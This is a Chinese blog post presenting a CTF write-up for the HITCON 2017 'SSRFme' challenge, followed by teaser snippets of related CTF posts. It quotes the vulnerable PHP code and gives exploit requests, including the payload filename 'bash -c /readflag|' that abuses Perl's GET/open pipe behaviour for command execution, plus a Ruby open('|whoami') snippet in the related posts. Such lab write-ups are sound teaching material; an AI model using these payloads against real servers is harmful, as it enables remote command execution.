一天一道ctf 第54天(GET open任意执行漏洞)

最新推荐文章于 2025-09-15 17:54:22 发布
原创 最新推荐文章于 2025-09-15 17:54:22 发布 · 460 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了一段PHP代码,该代码涉及SSRF(Server-Side Request Forgery)和文件操作漏洞。通过设置特定的HTTP头和URL参数,攻击者可以创建文件夹、读取根目录文件并利用open函数执行代码,最终获取到flag。过程包括新建文件夹、利用GET执行命令以及文件内容写入等步骤,展示了如何通过安全漏洞进行信息窃取。

[HITCON 2017]SSRFme

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

前半段代码用orange和ip地址的md5编码在sandbox下新建了一个文件夹并且进入到该文件夹下。后来再用GET执行url的参数,这里的GET是Lib for WWW in Perl中的命令,有任意命令执行漏洞。再用filename新建文件夹,并且将GET命令执行的结果放入该文件夹。

ip地址已经显示在源码页面上了,再加上orange用MD5编码得到文件夹名sandbox/5bfd90feef2e64d9ecea7d17eed33d47
读取根目录文件然后将结果存放到文件夹a中,再直接访问

http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn:81/?url=/&filename=a

http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn/sandbox/5bfd90feef2e64d9ecea7d17eed33d47/a


可以看到有flag和readflag文件,应该是要执行readflag才能获取到flag。这里用的是open函数的任意代码执行漏洞,我们先新建一个文件?url=&filename=bash -c /readflag|
然后利用open的漏洞执行代码?url=file:bash -c /readflag|&filename=c
再访问http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn:81/sandbox/5bfd90feef2e64d9ecea7d17eed33d47/c得到flag
在这里插入图片描述

scrawman
关注
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
[BUUCTF 2018]Online Tool CTF
wuyaowangchuan的博客
11-25 982
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool 进入环境 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } //获取客户端真实的IP地址 if(!isset($_GET['host'])) { highlight_file(__FILE.
buuctf部分题目wp
zhhhb1005的博客
06-19 1218
主要是记录平时做题遇见的没见过的题目
CTF-WEB】表单提交(特殊参数:?url=%80和?url=@)(通过GBK编码绕过实现文件包含读取flag)
最新发布
qq_37400312的博客
09-15 544
寻找这个单纯的网站的flag 前端代码: 漏洞分析 针对可提交文本框,%80的使用 不管输入任何数字,点击Submit,都没有任何反应,唯独网址处会get一下这个参数 那么我们在网址处,把参数换成%80,这回,网页开始变得不一样了 原理分析:当访问 时,需要从字符编码、后端处理逻辑和潜在漏洞的角度分析这一请求的意义: 将网页存储为html进行访问,便于观察。直接搜索flag,没有找到有用的信息 搜索data,发现了database.sqlite3文件,flag大概率在里面,不然这个题目不会无缘无故的出
ctf刷题记录
enhengzZ的博客
04-23 1656
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
python open 函数漏洞_input()函数中的Python漏洞
weixin_28943045的博客
03-01 292
在本文中,我们将学习在版本2.x中输入函数如何以不良方式运行。或更早。在2.x版中。raw_input()函数可替换该input()函数。在较新的版本3.x中。或稍后,将两个功能的所有所需特征和功能合并到该input()方法中。首先,让我们看一下在Python 2.x中接受输入的内置函数的输入类型。示例#InputGiven:Stringstr1=raw_input("Outputo...
CTF Tricks』Ruby-利用File.open()执行shell命令
Ho1aAs‘s Blog
09-18 1523
# 利用 ```ruby file = '|whoami' puts open(file).read() # ubuntu puts open(file).gets # ubuntu ```
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
rce无回显剖析
姜小孩的博客
12-12 5569
ctf中,有时会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否被执行,借着这次总结rce的机会,就把它一起总结了
[buuctf] crypto全解——85-120(不建议直接抄flag)
ao52426055的博客
11-24 9335
yxx 查看题目 啥也不是没看懂 用010查看进制 32位,再来查看明文.txt发现刚好也是32位字符,于是怀疑这道题是道一次性密码本OTP的题目,将明文与密文的txt一位一位异或即可得到flag 上脚本 python2的 h=['0A','03','17','02','56','01','15','11','0A','14','0E','0A','1E','30','0E','0A','1E','30','0E','0A','1E','30','14','0C','19','0D','1F','10'
ctf攻防世界open-source
qq_46927150的博客
04-10 2190
题目链接: https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5076&page=1打开附件可得到下面这段代码:分析:1.必须满足输入四个参数;2. 第二个参数等于 0xcafe;3. 第三个参数对5取余不能等于3,或者是对17取余等于8;4. 第四个参数是:h4ck...
Openctf-2016-pwn-apprentice_www 题解
lifanxin的博客
02-07 317
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年Openctf一道pwn题–apprentice_www 检查文件信息:   32位小端程序,只开启NX保护 漏洞定位 程序main函数如上图所示,setup函数中使用了mprotect开辟了一个可写、可读以及可执行的内存区域,其截图如下;加上checksec信息中的NX保护,其实这里已经暗示了将shellcode存储在此然后执行漏洞利用方法。 接下来我们看一下butterflySwag函数,如下图所示,其中第一个sc
ctf——逆向新手题目6 (open-source) WP
qq_52842965的博客
07-30 627
这次根据题目描述,我们将得到源代码,就先将附件下载出来 以下为本题提供的源码 #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsigned int first = atoi(argv[1]); if (first != 0xcafe) { printf("you a
CTF常用函数
sun的博客
05-04 1005
我们在做ctf题时经常需要看一些浏览器的请求和反应头,但是我们经常不能很好的了解他们,因此我对接收我们浏览器的请求头有关的后端$_SERVER变量做了一个总结。 $_SERVER``[``'HTTP_ACCEPT_LANGUAGE'``];``//浏览器语言 $_SERVER``[``'REMOTE_ADDR'``]; //当前用户 IP 。 $_SERVER``[``'REMOTE_HOS...
BUUCTF平台-web-边刷边记录-2
weixin_30376453的博客
08-13 663
1.one line tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_fil...
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1328
CTFHub技能树-web-ssrf
[BUUCTF 2018]Online Tool
pakho_C的博客
02-21 975
web第36题 [BUUCTF 2018]Online Tool 打开靶场 php代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET[
CTFSHOW 反序列化篇
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值